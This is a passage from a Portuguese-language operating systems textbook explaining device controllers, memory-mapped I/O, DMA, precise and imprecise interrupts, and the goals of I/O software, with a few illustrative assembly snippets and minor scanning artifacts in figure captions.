ter sido verificada e o bloco ter sido declarado livre 
de erros, ele pode então ser copiado para a memória 
principal. 

O controlador para um monitor LCD também fun- 
ciona um pouco como um dispositivo serial de bits em 
um nível igualmente baixo. Ele lê os bytes contendo 
os caracteres a serem exibidos da memória e gera os 
sinais para modificar a polarização da retroiluminação 
para os pixels correspondentes a fim de escrevê-los 
na tela. Se não fosse pelo controlador de tela, o pro- 
gramador do sistema operacional teria de programar 
explicitamente os campos elétricos de todos os pixels. 
Com o controlador, o sistema operacional o inicializa 
com alguns parâmetros, como o número de caracteres 
ou pixels por linha e o número de linhas por tela, e 
deixa o controlador cuidar realmente da orientação dos 
campos elétricos. 

Em um tempo muito curto, telas de LCD substitui- 
ram completamente os velhos monitores CRT (Catho- 
de Ray Tube — Tubo de Raios Catódicos). Monitores 
CRT disparam um feixe de elétrons em uma tela fluo- 
rescente. Usando campos magnéticos, o sistema é capaz 
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de curvar o feixe e atrair pixels sobre a tela. Compara- 
do com as telas de LCD, os monitores CRT eram gran- 
dalhões, gastadores de energia e frágeis. Além disso, a 
resolução das telas de LCD (Retina) de hoje é tão boa 
que o olho humano é incapaz de distinguir pixels indi- 
viduais. É difícil de imaginar que os laptops no passado 
vinham com uma pequena tela CRT que os deixava com 
mais de 20 cm de fundo e um peso de aproximadamente 
12 quilos. 


5.1.3 E/S mapeada na memória 


Cada controlador tem alguns registradores que são 
usados para comunicar-se com a CPU. Ao escrever nes- 
ses registradores, o sistema operacional pode coman- 
dar o dispositivo a fornecer e aceitar dados, ligar-se e 
desligar-se, ou de outra maneira realizar alguma ação. 
Ao ler a partir desses registradores, o sistema operacio- 
nal pode descobrir qual é o estado do dispositivo, se ele 
está preparado para aceitar um novo comando e assim 
por diante. 

Além dos registradores de controle, muitos disposi- 
tivos têm um buffer de dados a partir do qual o sistema 
operacional pode ler e escrever. Por exemplo, uma ma- 
neira comum para os computadores exibirem pixels na 
tela é ter uma RAM de vídeo, que é basicamente apenas 
um buffer de dados, disponível para ser escrita pelos 
programas ou sistema operacional. 

A questão que surge então é como a CPU se comu- 
nica com os registradores de controle e também com os 
buffers de dados do dispositivo. Existem duas alterna- 
tivas. Na primeira abordagem, para cada registrador de 
controle é designado um número de porta de E/S, um 
inteiro de 8 ou 16 bits. O conjunto de todas as portas de 
E/S formam o espaço de E/S, que é protegido de ma- 
neira que programas de usuário comuns não consigam 
acessá-lo (apenas o sistema operacional). Usando uma 
instrução de E/S especial como 


IN REG,PORT, 


a CPU pode ler o registrador de controle PORT e arma- 
zenar o resultado no registrador de CPU REG. Similar- 
mente, usando 


OUT PORT,REG 


a CPU pode escrever o conteúdo de REG para um con- 
trolador de registro. A maioria dos primeiros computa- 
dores, incluindo quase todos os de grande porte, como 
o IBM 360 e todos os seus sucessores, funcionava dessa 
maneira. 
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Nesse esquema, os espaços de endereçamento para 
memória e E/S são diferentes, como mostrado na Figura 
5.2(a). As instruções 


IN RO,4 


MOV RO,4 


são completamente diferentes nesse projeto. A primei- 
ra lê o conteúdo da porta de E/S 4 e o coloca em RO, 
enquanto a segunda lê o conteúdo da palavra de me- 
mória 4 e o coloca em RO. Os 4 nesses exemplos re- 
ferem-se a espaços de endereçamento diferentes e não 
relacionados. 

A segunda abordagem, introduzida com o PDP-11, é 
mapear todos os registradores de controle no espaço da 
memória, como mostrado na Figura 5.2(b). Para cada 
registrador de controle é designado um endereço de me- 
mória único para o qual nenhuma memória é designada. 
Esse sistema é chamado de E/S mapeada na memória. 
Na maioria dos sistemas, os endereços designados estão 
no — ou próximos do — topo do espaço de endereça- 
mento. Um esquema híbrido, com buffers de dados de 
E/S mapeados na memória e portas de E/S separadas 
para os registradores de controle, é mostrado na Figura 
5.2(c). O x86 usa essa arquitetura, com endereços de 
640K a IM — 1 sendo reservados para buffers de dados 
de dispositivos em PCs compatíveis com a IBM, além 
de portas de E/S de 0 a 64K — 1. 

Como esses esquemas realmente funcionam na práti- 
ca? Em todos os casos, quando a CPU quer ler uma pala- 
vra, seja da memória ou de uma porta de E/S, ela coloca 
o endereço de que precisa nas linhas de endereçamento 
do barramento e então emite um sinal READ sobre uma 
linha de controle do barramento. Uma segunda linha de 
sinal é usada para dizer se o espaço de E/S ou o espaço 
de memória é necessário. Se for o espaço de memória, a 
memória responde ao pedido. Se for o espaço de E/S, o 
dispositivo de E/S responde ao pedido. Se houver apenas 


espaço de memória [como na Figura 5.2(b)], cada mó- 
dulo de memória e cada dispositivo de E/S comparam as 
linhas de endereços com a faixa de endereços que elas 
servem. Se o endereço cair na sua faixa, ela responde ao 
pedido. Tendo em vista que nenhum endereço jamais é 
designado tanto à memória quanto a um dispositivo de 
E/S, não há ambiguidade ou conflito. 

Esses dois esquemas de endereçamento dos contro- 
ladores têm diferentes pontos fortes e fracos. Vamos co- 
meçar com as vantagens da E/S mapeada na memória. 
Primeiro, se instruções de E/S especiais são necessárias 
para ler e escrever os registradores de controle do dispo- 
sitivo, acessá-los exige o uso de código de montagem, 
já que não há como executar uma instrução IN ou OUT 
em C ou C++. Uma chamada a esse procedimento acar- 
reta um custo adicional ao controle de E/S. Por outro 
lado, com a E/S mapeada na memória, os registradores 
de controle do dispositivo são apenas variáveis na me- 
mória e podem ser endereçados em C da mesma manei- 
ra que quaisquer outras variáveis. Desse modo, com a 
E/S mapeada na memória, um driver do dispositivo de E/S 
pode ser escrito inteiramente em C. Sem a E/S mapeada 
na memória, é necessário algum código em linguagem 
de montagem. 

Segundo, com a E/S mapeada na memória, nenhum 
mecanismo de proteção especial é necessário para evi- 
tar que processos do usuário realizem E/S. Tudo o que 
o sistema operacional precisa fazer é deixar de colocar 
aquela porção do espaço de endereçamento contendo os 
registros de controle no espaço de endereçamento virtu- 
al de qualquer usuário. Melhor ainda, se cada dispositi- 
vo tem os seus registradores de controle em uma página 
diferente do espaço de endereçamento, o sistema opera- 
cional pode dar a um usuário controle sobre dispositi- 
vos específicos, mas não dar a outros, ao simplesmente 
incluir as páginas desejadas em sua tabela de páginas. 
Esse esquema pode permitir que diferentes drivers de 
dispositivos sejam colocados em diferentes espaços de 


[FIGURA 5.2] (a) Espaços de memória e E/S separados. (b) E/S mapeada na memória. (c) Híbrido. 
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endereçamento, não apenas reduzindo o tamanho do 
núcleo, mas também impedindo que um driver interfira 
nos outros. 

Terceiro, com a E/S mapeada na memória, cada ins- 
trução capaz de referenciar a memória também referen- 
cia os registradores de controle. Por exemplo, se houver 
uma instrução, TEST, que testa se uma palavra de me- 
mória é 0, ela também poderá ser usada para testar se 
um registrador de controle é 0, o que pode ser o sinal 
de que o dispositivo está ocioso e pode aceitar um novo 
comando. O código em linguagem de montagem pode 
parecer da seguinte maneira: 


LOOP: TEST PORT 4 
BEQ READY 
BRANCH LOOP 


// verifica se a porta 4 e O 
// se for O, salta para READY 


// caso contrario, continua 
testando 
READY: 


Se a E/S mapeada na memória não estiver presente, 
o registrador de controle deve primeiro ser lido na CPU, 
então testado, exigindo duas instruções em vez de uma. 
No caso do laço mostrado, uma quarta instrução preci- 
sa ser adicionada, atrasando ligeiramente a detecção de 
ociosidade do dispositivo. 

No projeto de computadores, praticamente tudo en- 
volve uma análise de custo-benefício, e este é o caso 
aqui também. A E/S mapeada na memória também tem 
suas desvantagens. Primeiro, a maioria dos computa- 
dores hoje tem alguma forma de cache para as palavras 
de memória. O uso de cache para um registrador de 
controle do dispositivo seria desastroso. Considere o 
laço em código de montagem dado anteriormente na 
presença de cache. A primeira referência a PORT 40 
faria ser colocado em cache. Referências subsequentes 
simplesmente tomariam o valor da cache e nem per- 
guntariam ao dispositivo. Então quando o dispositivo 
por fim estivesse pronto, o software não teria como 
descobrir. Em vez disso, o laço entraria em repetição 
para sempre. 

Para evitar essa situação com a E/S mapeada na me- 
mória, o hardware tem de ser capaz de desabilitar se- 
letivamente a cache, por exemplo, em um sistema por 
página. Essa característica acrescenta uma complexida- 
de extra tanto para o hardware, quanto para o sistema 
operacional, o qual deve gerenciar a cache seletiva. 

Segundo, se houver apenas um espaço de endere- 
çamento, então todos os módulos de memória e todos 
os dispositivos de E/S terão de examinar todas as refe- 
rências de memória para ver quais devem ser respon- 
didas por cada um. Se o computador tiver um único 
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barramento, como na Figura 5.3(a), cada componente 
poderá olhar para cada endereço diretamente. 

No entanto, a tendência nos computadores pesso- 
ais modernos é ter um barramento de memória de alta 
velocidade dedicado, como mostrado na Figura 5.3(b). 
O barramento é feito sob medida para otimizar o de- 
sempenho da memória, sem concessões para o bem de 
dispositivos de E/S lentos. Os sistemas x86 podem ter 
múltiplos barramentos (memória, PCle, SCSI e USB), 
como mostrado na Figura 1.12. 

O problema de ter um barramento de memória se- 
parado em máquinas mapeadas na memória é que os 
dispositivos de E/S não têm como enxergar os endere- 
ços de memória quando estes são lançados no barra- 
mento da memória, de maneira que eles não têm como 
responder. Mais uma vez, medidas especiais precisam 
ser tomadas para fazer que a E/S mapeada na memória 
funcione em um sistema com múltiplos barramentos. 
Uma possibilidade pode ser enviar primeiro todas as re- 
ferências de memória para a memória. Se esta falhar em 
responder, então a CPU tenta outros barramentos. Esse 
projeto pode se tornar exequível, mas ele exige uma 
complexidade adicional do hardware. 

Um segundo projeto possível é colocar um disposi- 
tivo de escuta no barramento de memória para passar 
todos os endereços apresentados para os dispositivos 
de E/S potencialmente interessados. O problema aqui 


lei VS (a) Arquitetura com barramento único. 
(b) Arquitetura de memória com barramento duplo. 
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é que os dispositivos de E/S podem não ser capazes de 
processar pedidos na mesma velocidade da memória. 
Um terceiro projeto possível, e que se enquadraria 
bem naquele desenhado na Figura 1.12, é filtrar ende- 
reços no controlador de memória. Nesse caso, o chip 
controlador de memória contém registradores de faixa 
que são pré-carregados no momento da inicialização. 
Por exemplo, de 640K a IM — 1 poderia ser marcado 
como uma faixa de endereços reservada não utilizá- 
vel como memória. Endereços que caem dentro dessas 
faixas marcadas são transferidos para dispositivos em 
vez da memória. A desvantagem desse esquema é a 
necessidade de descobrir no momento da inicialização 
quais endereços de memória são realmente endereços 
de memória. Desse modo, cada esquema tem argumen- 
tos favoráveis e contrários, de maneira que concessões e 
avaliações de custo-benefício são inevitáveis. 


5.1.4 Acesso direto à memória (DMA) 


Não importa se uma CPU tem ou não E/S mapeada 
na memória, ela precisa endereçar os controladores dos 
dispositivos para poder trocar dados com eles. A CPU 
pode requisitar dados de um controlador de E/S um byte 
de cada vez, mas fazê-lo desperdiça o tempo da CPU, de 
maneira que um esquema diferente, chamado de acesso 
direto à memória (Direct Memory Access — DMA) 
é usado muitas vezes. Para simplificar a explicação, 
presumimos que a CPU acessa todos os dispositivos 
e memória mediante um único barramento de sistema 
que conecta a CPU, a memória e os dispositivos de E/S, 
como mostrado na Figura 5.4. Já sabemos que a orga- 
nização real em sistemas modernos é mais complicada, 
mas todos os princípios são os mesmos. O sistema ope- 
racional pode usar somente DMA se o hardware tiver 


aleluisy-Wee-§ Operação de transferência utilizando DMA. 


1. CPU 
programa Controlador 
CPU o controlador de DMA 


de DMA 


Interrompe quando 
concluído 


2. DMA solicita transfe- 
rência para a memória 


um controlador de DMA, o que a maioria dos sistemas 
tem. Às vezes esse controlador é integrado em controla- 
dores de disco e outros, mas um projeto desses exige um 
controlador de DMA separado para cada dispositivo. 
Com mais frequência, um único controlador de DMA 
está disponível (por exemplo, na placa-mãe) a fim de 
controlar as transferências para múltiplos dispositivos, 
muitas vezes simultaneamente. 

Não importa onde esteja localizado fisicamente, o 
controlador de DMA tem acesso ao barramento do sis- 
tema independente da CPU, como mostrado na Figura 
5.4. Ele contém vários registradores que podem ser es- 
critos e lidos pela CPU. Esses incluem um registrador 
de endereço de memória, um registrador contador de 
bytes e um ou mais registradores de controle. Os re- 
gistradores de controle especificam a porta de E/S a ser 
usada, a direção da transferência (leitura do dispositivo 
de E/S ou escrita para o dispositivo de E/S), a unidade de 
transferência (um byte por vez ou palavra por vez) e o 
número de bytes a ser transferido em um surto. 

Para explicar como o DMA funciona, vamos exami- 
nar primeiro como ocorre uma leitura de disco quando o 
DMA não é usado. Primeiro o controlador de disco lê o 
bloco (um ou mais setores) do dispositivo serialmente, bit 
por bit, até que o bloco inteiro esteja no buffer interno do 
controlador. Em seguida, ele calcula a soma de verifica- 
ção para verificar que nenhum erro de leitura tenha ocor- 
rido. Então o controlador causa uma interrupção. Quando 
o sistema operacional começa a ser executado, ele pode 
ler o bloco de disco do buffer do controlador um byte ou 
uma palavra de cada vez executando um laço, com cada 
iteração lendo um byte ou palavra de um registrador do 
controlador e armazenando-a na memória principal. 

Quando o DMA é usado, o procedimento é diferente. 
Primeiro a CPU programa o controlador de DMA 
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configurando seus registradores para que ele saiba o que 
transferir para onde (passo 1 na Figura 5.4). Ela também 
emite um comando para o controlador de disco dizendo 
para ele ler os dados do disco para o seu buffer interno 
e verificar a soma de verificação. Quando os dados que 
estão no buffer do controlador de disco são válidos, o 
DMA pode começar. 

O controlador de DMA inicia a transferência emi- 
tindo uma solicitação de leitura via barramento para o 
controlador de disco (passo 2). Essa solicitação de lei- 
tura se parece com qualquer outra, e o controlador de 
disco não sabe (ou se importa) se ela veio da CPU ou de 
um controlador de DMA. Tipicamente, o endereço 
de memória para onde escrever está nas linhas de ende- 
reçamento do barramento, então quando o controlador 
de disco busca a palavra seguinte do seu buffer interno, 
ele sabe onde escrevê-la. A escrita na memória é outro 
ciclo de barramento-padrão (passo 3). Quando a escrita 
está completa, o controlador de disco envia um sinal de 
confirmação para o controlador de DMA, também via 
barramento (passo 4). O controlador de DMA então in- 
crementa o endereço de memória e diminui o contador 
de bytes. Se o contador de bytes ainda for maior do que 
0, os passos 2 até 4 são repetidos até que o contador che- 
gue a 0. Nesse momento, o controlador de DMA inter- 
rompe a CPU para deixá-la ciente de que a transferência 
está completa agora. Quando o sistema operacional é 
inicializado, ele não precisa copiar o bloco de disco para 
a memória, pois ele já está lá. 

Controladores de DMA variam consideravelmente 
em sofisticação. Os mais simples lidam com uma trans- 
ferência de cada vez, como acabamos de descrever. Os 
mais complexos podem ser programados para lidar com 
múltiplas transferências ao mesmo tempo. Esses contro- 
ladores têm múltiplos conjuntos de registradores interna- 
mente, um para cada canal. A CPU inicializa carregando 
cada conjunto de registradores com os parâmetros rele- 
vantes para sua transferência. Cada transferência deve 
usar um controlador de dispositivos diferente. Após cada 
palavra ser transferida (passos 2 a 4) na Figura 5.4, o 
controlador de DMA decide qual dispositivo servir em 
seguida. Ele pode ser configurado para usar um algo- 
ritmo de alternância circular (round-robin), ou ter um 
esquema de prioridade projetado para favorecer alguns 
dispositivos em detrimento de outros. Múltiplas solicita- 
ções para diferentes controladores de dispositivos podem 
estar pendentes ao mesmo tempo, desde que exista uma 
maneira clara de identificar separadamente os sinais de 
confirmação. Por esse motivo, muitas vezes uma linha 
diferente de confirmação no barramento é usada para 
cada canal de DMA. 
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Muitos barramentos podem operar em dois modos: 
modo uma palavra de cada vez (word-at-a-time mode) 
e modo bloco. Alguns controladores de DMA também 
podem operar em ambos os modos. No primeiro, a ope- 
ração funciona como descrito: o controlador de DMA 
solicita a transferência de uma palavra e consegue. Se 
a CPU também quiser o barramento, ela tem de espe- 
rar. O mecanismo é chamado de roubo de ciclo, pois o 
controlador do dispositivo entra furtivamente e rouba 
um ciclo de barramento ocasional da CPU de vez em 
quando, atrasando-a ligeiramente. No modo bloco, o 
controlador de DMA diz para o dispositivo para adquirir 
o barramento, emitir uma série de transferências, então 
libera o barramento. Essa forma de operação é chamada 
de modo de surto (burst). Ela é mais eficiente do que o 
roubo de ciclo, pois adquirir o barramento leva tempo e 
múltiplas palavras podem ser transferidas pelo preço de 
uma aquisição de barramento. A desvantagem do modo 
de surto é que ele pode bloquear a CPU e outros dispo- 
sitivos por um período substancial caso um surto longo 
esteja sendo transferido. 

No modelo que estivemos discutindo, também cha- 
mado de modo direto (fly-by mode), o controlador do 
DMA diz para o controlador do dispositivo para transfe- 
rir os dados diretamente para a memoria principal. Um 
modo alternativo que alguns controladores de DMA 
usam estabelece que o controlador do dispositivo deve 
enviar a palavra para o controlador de DMA, que então 
emite uma segunda solicitação de barramento para es- 
crever a palavra para qualquer que seja o seu destino. 
Esse esquema exige um ciclo de barramento extra por 
palavra transferida, mas é mais flexível no sentido de 
que ele pode também desempenhar cópias dispositivo- 
-para-dispositivo e mesmo cópias memória-para-me- 
mória (ao emitir primeiro uma requisição de leitura à 
memória e então uma requisição de escrita à memória, 
em endereços diferentes). 

A maioria dos controladores de DMA usa ende- 
reços físicos de memória para suas transferências. O 
uso de endereços físicos exige que o sistema opera- 
cional converta o endereço virtual do buffer de me- 
mória pretendido em um endereço físico e escreva 
esse endereço físico no registrador de endereço do 
controlador de DMA. Um esquema alternativo usa- 
do em alguns controladores de DMA é em vez disso 
escrever o próprio endereço virtual no controlador 
de DMA. Então o controlador de DMA deve usar a 
unidade de gerenciamento de memória (Memory Ma- 
nagement Unit — MMU) para fazer a tradução de 
endereço virtual para físico. Apenas no caso em que a 
MMU faz parte da memória (possível, mas raro), em 
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vez de parte da CPU, os endereços virtuais podem ser 
colocados no barramento. 

Mencionamos anteriormente que o disco primei- 
ro lê dados para seu buffer interno antes que o DMA 
possa ser inicializado. Você pode estar imaginando por 
que o controlador não armazena simplesmente os bytes 
na memória principal tão logo ele as recebe do disco. 
Em outras palavras, por que ele precisa de um buffer 
interno? Há duas razões. Primeiro, ao realizar armaze- 
namento interno, o controlador de disco pode conferir a 
soma de verificação antes de começar uma transferên- 
cia. Se a soma de verificação estiver incorreta, um erro 
é sinalizado e nenhuma transferência é feita. 

A segunda razão é que uma vez inicializada uma 
transferência de disco os bits continuam chegando do 
disco a uma taxa constante, não importa se o contro- 
lador estiver pronto para eles ou não. Se o controlador 
tentasse escrever dados diretamente na memória, ele 
teria de acessar o barramento do sistema para cada pa- 
lavra transferida. Se o barramento estivesse ocupado 
por algum outro dispositivo usando-o (por exemplo, no 
modo surto), o controlador teria de esperar. Se a pró- 
xima palavra de disco chegasse antes que a anterior 
tivesse sido armazenada, o controlador teria de armaze- 
ná-la em outro lugar. Se o barramento estivesse muito 
ocupado, o controlador poderia terminar armazenando 
um número considerável de palavras e tendo bastante 
gerenciamento para fazer também. Quando o bloco é 
armazenado internamente, o barramento não se faz ne- 
cessário até que o DMA comece; portanto, o projeto do 
controlador é muito mais simples, pois utilizando DMA 
o momento de transferência para a memória não é um 
fator crítico. (Alguns controladores mais antigos iam, 
na realidade, diretamente para a memória com apenas 
uma pequena quantidade de armazenamento interno, 
mas quando o barramento estava muito ocupado, uma 
transferência talvez tivesse de ser terminada com um 
erro de transbordo de pilha.) 


Nem todos os computadores usam DMA. O argu- 
mento contra ele é que a CPU principal muitas vezes é 
muito mais rápida do que o controlador de DMA e pode 
fazer o trabalho muito mais rápido (quando o fator limi- 
tante não é a velocidade do dispositivo de E/S). Se não 
há outro trabalho para ela realizar, fazer a CPU (rápida) 
esperar pelo controlador de DMA (lento) terminar, não 
faz sentido. Também, livrar-se do controlador de DMA 
e ter a CPU realizando todo o trabalho via software eco- 
nomiza dinheiro, algo importante em computadores de 
baixo custo (embarcados). 


5.1.5 Interrupções revisitadas 


Introduzimos brevemente as interrupções na Seção 
1.3.4, mas há mais a ser dito. Em um sistema típico 
de computador pessoal, a estrutura de interrupção é 
como a mostrada na Figura 5.5. No nível do hardwa- 
re, as interrupções funcionam como a seguir. Quando 
um dispositivo de E/S termina o trabalho dado a ele, 
gera uma interrupção (presumindo que as interrupções 
tenham sido habilitadas pelo sistema operacional). Ele 
faz isso enviando um sinal pela linha de barramento à 
qual está associado. Esse sinal é detectado pelo chip 
controlador de interrupções na placa-mãe, que então 
decide o que fazer. 

Se nenhuma outra interrupção estiver pendente, o 
controlador de interrupção processa a interrupção ime- 
diatamente. No entanto, se outra interrupção estiver em 
andamento, ou outro dispositivo tiver feito uma solicita- 
ção simultânea em uma linha de requisição de interrup- 
ção de maior prioridade no barramento, o dispositivo é 
simplesmente ignorado naquele momento. Nesse caso, 
ele continua a gerar um sinal de interrupção no barra- 
mento até ser atendido pela CPU. 

Para tratar a interrupção, o controlador coloca um 
número sobre as linhas de endereço especificando qual 
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dispositivo requer atenção e repassa um sinal para inter- 
romper a CPU. 

O sinal de interrupção faz a CPU parar aquilo que 
ela está fazendo e começar outra atividade. O número 
nas linhas de endereço é usado como um índice em uma 
tabela chamada de vetor de interrupções para buscar 
um novo contador de programa. Esse contador de pro- 
grama aponta para o início da rotina de tratamento da 
interrupção correspondente. Em geral, interrupções de 
software (traps ou armadilhas) e de hardware usam o 
mesmo mecanismo desse ponto em diante, muitas vezes 
compartilhando o mesmo vetor de interrupções. A loca- 
lização do vetor de interrupções pode ser estabelecida 
fisicamente na máquina ou estar em qualquer lugar na 
memória, com um registrador da CPU (carregado pelo 
sistema operacional) apontando para sua origem. 

Logo após o início da execução, a rotina de trata- 
mento da execução reconhece a interrupção escrevendo 
um determinado valor para uma das portas de E/S do 
controlador de interrupção. Esse reconhecimento diz ao 
controlador que ele está livre para gerar outra interrup- 
ção. Ao fazer a CPU atrasar esse reconhecimento até 
que ela esteja pronta para lidar com a próxima interrup- 
ção, podem ser evitadas condições de corrida envolven- 
do múltiplas (quase simultâneas) interrupções. Como 
nota, alguns computadores (mais velhos) não têm um 
controlador de interrupções centralizado, de maneira 
que cada controlador de dispositivo solicita as suas pró- 
prias interrupções. 

O hardware sempre armazena determinadas informa- 
ções antes de iniciar o procedimento de serviço. Quais 
informações e onde elas são armazenadas varia muito 
de CPU para CPU. No mínimo, o contador do programa 
deve ser salvo, de maneira que o processo interrompido 
possa ser reiniciado. No outro extremo, todos os regis- 
tradores visíveis e um grande número de registradores 
internos podem ser salvos também. 

Uma questão é onde salvar essas informações. Uma 
opção é colocá-las nos registradores internos que o sis- 
tema operacional pode ler conforme a necessidade. Um 
problema com essa abordagem é que então o controla- 
dor de interrupções não pode ser reconhecido até que 
todas as informações potencialmente relevantes tenham 
sido lidas, a fim de que uma segunda informação não 
sobreponha os registradores internos durante o salva- 
mento. Essa estratégia leva a longos períodos de tempo 
desperdiçados quando as interrupções são desabilitadas 
e possivelmente a interrupções e dados perdidos. 

Em consequência, a maioria das CPUs salva as in- 
formações em uma pilha. No entanto, essa abordagem 
também tem problemas. Para começo de conversa, de 
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quem é a pilha? Se a pilha atual for usada, ela pode mui- 
to bem ser uma pilha do processo do usuário. O ponteiro 
da pilha pode não ter legitimidade, o que causaria um 
erro fatal quando o hardware tentasse escrever algumas 
palavras no endereço apontado. Também, ele poderia 
apontar para o fim de uma página. Após várias escri- 
tas na memória, o limite da página pode ser excedido e 
uma falta de página gerada. A ocorrência de uma falta 
de página durante o processamento de uma interrupção 
de hardware cria um problema maior: onde salvar o es- 
tado para tratar a falta de página? 

Se for usada a pilha de núcleo, há uma chance muito 
maior de o ponteiro de pilha ser legítimo e estar apon- 
tando para uma página na memória. No entanto, o cha- 
veamento para o modo núcleo pode requerer a troca de 
contextos da MMU e provavelmente invalidará a maior 
parte da cache — ou toda ela — e a tabela de tradução 
de endereços (translation look aside table — TLB). A 
recarga de toda essa informação, estática ou dinamica- 
mente, aumenta o tempo para processar uma interrup- 
ção e, desse modo, desperdiça tempo de CPU. 


Interrupções precisas e imprecisas 


Outro problema é causado pelo fato de a maioria das 
CPUs modernas ser projetada com pipelines profundos 
e, muitas vezes, superescalares (paralelismo interno). Em 
sistemas mais antigos, após cada instrução finalizar a sua 
execução, o microprograma ou hardware era verificado 
para ver se havia uma interrupção pendente. Se fosse o 
caso, o contador de programa e a palavra de estado do 
programa (Program Status Word — PSW) eram colo- 
cados na pilha e a sequência de interrupção começava. 
Após o fim do tratamento da interrupção, ocorria o pro- 
cesso reverso, com a velha PSW e o contador do progra- 
ma retirados da pilha e o processo anterior continuado. 

Esse modelo faz a suposição implícita de que se 
ocorrer uma interrupção logo após alguma instrução, 
todas as instruções até ela (incluindo-a) foram execu- 
tadas completamente, e nenhuma interrupção posterior 
foi executada de maneira alguma. Em máquinas mais 
antigas, tal suposição sempre foi válida. Nas modernas, 
talvez não seja. 

Para começo de conversa, considere o modelo de 
pipeline da Figura 1.7(a). O que acontece se uma in- 
terrupção ocorrer enquanto o pipeline está cheio (o 
caso usual)? Muitas instruções estão em vários estágios 
de execução. Quando ocorre a interrupção, o valor do 
contador do programa pode não refletir o limite corre- 
to entre as instruções executadas e as não executadas. 
Na realidade, muitas instruções talvez tenham sido 
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parcialmente executadas, com diferentes instruções es- 
tando mais ou menos completas. Nessa situação, o con- 
tador do programa provavelmente refletirá o endereço 
da próxima instrução a ser buscada e colocada no pipe- 
line em vez do endereço da instrução que acabou de ser 
processada pela unidade de execução. 

Em uma máquina superescalar, como a da Figura 
1.7(b), as coisas são ainda piores. As instruções podem 
ser decompostas em micro-operações e estas podem ser 
executadas fora de ordem, dependendo da disponibili- 
dade dos recursos internos, como unidades funcionais 
e registradores. No momento de uma interrupção, al- 
gumas instruções enviadas há muito tempo talvez não 
tenham sido iniciadas e outras mais recentes talvez es- 
tejam quase concluídas. No momento em que uma in- 
terrupção é sinalizada, pode haver muitas instruções em 
vários estados de completude, com uma relação menor 
entre elas e o contador do programa. 

Uma interrupção que deixa a máquina em um estado 
bem definido é chamada de uma interrupção precisa 
(WALKER e CRAGON, 1995). Uma interrupção assim 
possui quatro propriedades: 


1. O contador do programa (Program Counter — 
PC) é salvo em um lugar conhecido. 

2. Todas as instruções anteriores aquela apontada 
pelo PC foram completadas. 

3. Nenhuma instrução posterior à apontada pelo PC 
foi concluída. 

4. O estado de execução da instrução apontada pelo 
PC é conhecido. 


Observe que não existe proibição para que as instru- 
ções posteriores à apontada pelo PC sejam iniciadas. A 
questão é apenas que quaisquer alterações que elas fa- 
çam aos registradores ou memória devem ser desfeitas 
antes que a interrupção ocorra. É permitido que a instru- 
ção apontada tenha sido executada. Também é permiti- 
do que ela não tenha sido executada. No entanto, deve 
ficar claro qual caso se aplica à situação. Muitas vezes, 
se a interrupção é de E/S, a instrução não terá começado 
ainda. No entanto, se ela é uma interrupção de software 
ou uma falta de página, então o PC geralmente aponta 
para a instrução que causou a falta para que ele possa 
ser reinicializado mais tarde. A situação da Figura 5.6(a) 
ilustra uma interrupção precisa. Todas as instruções até 
o contador do programa (316) foram concluídas e ne- 
nhuma das que estão além dele foi iniciada (ou foi re- 
trocedida para desfazer os seus efeitos). 

Uma interrupção que não atende a essas exigências 
é chamada de interrupção imprecisa e dificulta bas- 
tante a vida do projetista do sistema operacional, que 


agora tem de descobrir o que aconteceu e o que ainda 
está para acontecer. A Figura 5.6(b) ilustra uma inter- 
rupção imprecisa, em que diferentes instruções próxi- 
mas do contador do programa estão em diferentes estágios 
de conclusão, com as mais antigas não necessariamente 
mais completas que as mais novas. Máquinas com in- 
terrupções imprecisas despejam em geral uma grande 
quantidade de estado interno sobre a pilha para propor- 
cionar ao sistema operacional a possibilidade de desco- 
brir o que está acontecendo. O código necessário para 
reiniciar a máquina costuma ser muito complicado. 
Também, salvar uma quantidade grande de informações 
na memória em cada interrupção torna as interrupções 
lentas e a recuperação ainda pior. Isso gera a situação 
irônica de termos CPUs superescalares muito rápidas 
sendo, às vezes, inadequadas para o trabalho em tempo 
real por causa das interrupções lentas. 

Alguns computadores são projetados de maneira que 
alguns tipos de interrupções de software e de hardware 
são precisos e outros não. Por exemplo, ter interrupções 
de E/S precisas, mas interrupções de software impreci- 
sas por erros de programação fatais não é algo tão ruim, 
pois nenhuma tentativa precisa ser feita para reiniciar 
um processo em execução após ele ter feito uma divisão 
por zero. Algumas máquinas têm um bit que pode ser 
configurado para forçar que todas as interrupções sejam 
precisas. A desvantagem de se configurar esse bit é que 
ele força a CPU a registrar cuidadosamente tudo o que ela 
está fazendo e manter cópias de proteção dos registra- 
dores a fim de poder gerar uma interrupção precisa a 
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qualquer instante. Toda essa sobrecarga tem um impac- 
to importante sobre o desempenho. 

Algumas máquinas superescalares, como as da fa- 
mília x86, têm interrupções precisas para permitir que 
softwares antigos funcionem corretamente. O custo por 
essa compatibilidade com interrupções precisas é uma 
lógica de interrupção extremamente complexa dentro 
da CPU para certificar-se de que, quando o controla- 
dor da interrupção sinaliza que ele quer gerar uma in- 
terrupção, deixem-se terminar todas as instruções até 
um determinado ponto e nada além daquele ponto tenha 
qualquer efeito perceptível sobre o estado da máquina. 
Aqui o custo não é em tempo, mas em área de chip e na 
complexidade do projeto. Se interrupções precisas não 
fossem necessárias para fins de compatibilidade com 
versões antigas, essa área de chip seria disponível para 
caches maiores dentro do chip, tornando a CPU mais rá- 
pida. Por outro lado, interrupções imprecisas tornam o 
sistema operacional muito mais complicado e lento, en- 
tão é difícil dizer qual abordagem é realmente melhor. 


5.2 Princípios do software de E/S 


Vamos agora deixar de lado por enquanto o hardware 
de E/S e examinar o software de E/S. Primeiro analisare- 
mos suas metas e então as diferentes maneiras que a E/S 
pode ser feita do ponto de vista do sistema operacional. 


5.2.1 Objetivos do software de E/S 


Um conceito fundamental no projeto de software de 
E/S é conhecido como independência de dispositivo. 
O que isso significa é que devemos ser capazes de escre- 
ver programas que podem acessar qualquer dispositivo 
de E/S sem ter de especificá-lo antecipadamente. Por 
exemplo, um programa que lê um arquivo como entrada 
deve ser capaz de ler um arquivo em um disco rígido, 
um DVD ou em um pen-drive sem ter de ser modificado 
para cada dispositivo diferente. Similarmente, deveria 
ser possível digitar um comando como 


sort <input >output 


que trabalhe com uma entrada vinda de qualquer tipo 
de disco ou teclado e a saída indo para qualquer tipo de 
disco ou tela. Fica a cargo do sistema operacional cuidar 
dos problemas causados pelo fato de que esses disposi- 
tivos são realmente diferentes e exigem sequências de 
comando muito diferentes para ler ou escrever. 

Um objetivo muito relacionado com a independência 
do dispositivo é a nomeação uniforme. O nome de um 
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arquivo ou um dispositivo deve simplesmente ser uma 
